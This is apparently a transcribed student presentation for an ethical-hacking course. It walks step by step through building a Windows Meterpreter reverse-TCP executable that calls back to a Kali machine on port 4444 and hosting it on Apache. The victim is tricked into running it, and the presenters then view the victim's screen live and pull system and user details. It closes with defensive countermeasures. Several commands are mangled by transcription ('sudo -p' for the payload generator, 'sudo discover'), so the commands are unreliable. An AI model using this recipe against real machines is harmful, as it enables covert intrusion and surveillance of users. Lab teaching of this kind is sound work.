Assalamualaikum warahmatullahi wabarakatuh. Today we want presentation problem-based task 2 ethical hacking. My name is Siti Natira binti Nur Asmawi. My number matrix is F1122. My name is Nashafia binti Muhammad Amin Tawakal. My matrix number is F1120. My name is Nora Kila Nadia binti Noriza. My matrix number is F1150.
Generate a malicious payload. For the step 1, open Kali Linux and click login. Log in your user ID and your password. After that, second, open terminal Kali in Kali Linux. Step 3, run use command ifconfig to identify Kali IP address. INET, the INET is for IP Kali address is 192.168.77.128. And step 4 is open the Windows 10 in VMware. 5. Open command prompt and use command ipconfig to get Windows 10 IP address. Step 6. Use nmap -sv to scan the victim IP and identify open ports. 7. Ping IP Windows 10 at Kali. We use the command ping because to check Windows victim active or not. And 8. Run sudo discover -r command on Kali to know available target. We use this because they identify the IP address of the victim Windows that is on the same network as the Kali Linux machine. Step 9, the result after you sudo net discover -r and scanning the IP Windows 10 is 192.168.77.134, and step 10 is use sudo -p to create the payloads. And you should use the command sudo -p windows /meterpreter/reverse _tcp and use lhost IP Kali port 4444 -f exe, and we rename the file is pbt2.exe.
For step 2, transfer the payload to the victim. First, we use sudo mkdir to create the file. Second, we use sudo env to move a file name. Then use ls to check the web server file. Then use sudo service apache to start Apache web server. Use ls to check the hosted file. Step 3. Start a Metasploit listener. Run MSF console to open Metasploit framework and use exploit multi-handler and set payload, host, port, then run exploit command. After that, open web browser at Windows 10 using HTTP, IP Kali and folder name. Click on exe file, then we will try to download, then click keep. 6. Click Keep Anyway. The malicious file will automatically downloaded on the browser, and click Run Anyway to run the exe file.
For the next step, as we can see, the Meterpreter session 1 is open. Okay. The next step is we can use command lls to see all the files in Kali during Meterpreter session. The next step is use command screen share to allow attacker to view the victim screen live through Meterpreter session. And we can see the output is this is Windows 10 browser.
Now we can see the activity from the browser of Windows 10 in Kali, which is the output is now YouTube. For the step 4 is verify remote access. First, we can use the command sysinfo to show victim system information such as OS and hostname. So the output, we can see the name of computer, OS, architecture, system language, domain, log on user, and meter. Second, we can use the command getuid to show the username of user who is currently logged in Windows 10. So the output, the username is desktop -9u9ssvd-akila. Number 3, use the command screen share to stop the screen share, plus use command control plus C. For the last step is step 5. The step 5 is detection and prevention, which is a suggest countermeasure. First is install and regularly update antivirus or anti-malware. Second, block uncommon ports, which is ports 4444 via firewall. 3, use application with listing, allow and only trusted program. 4, educate user about phishing and suspicious download. 5, keeps OS and application update. 6, deploy IDS or IPS to detect reverse shell activities. 7, monitor log for suspicious network connection. And lastly is use user account control, the stand is UAC, and list privilege.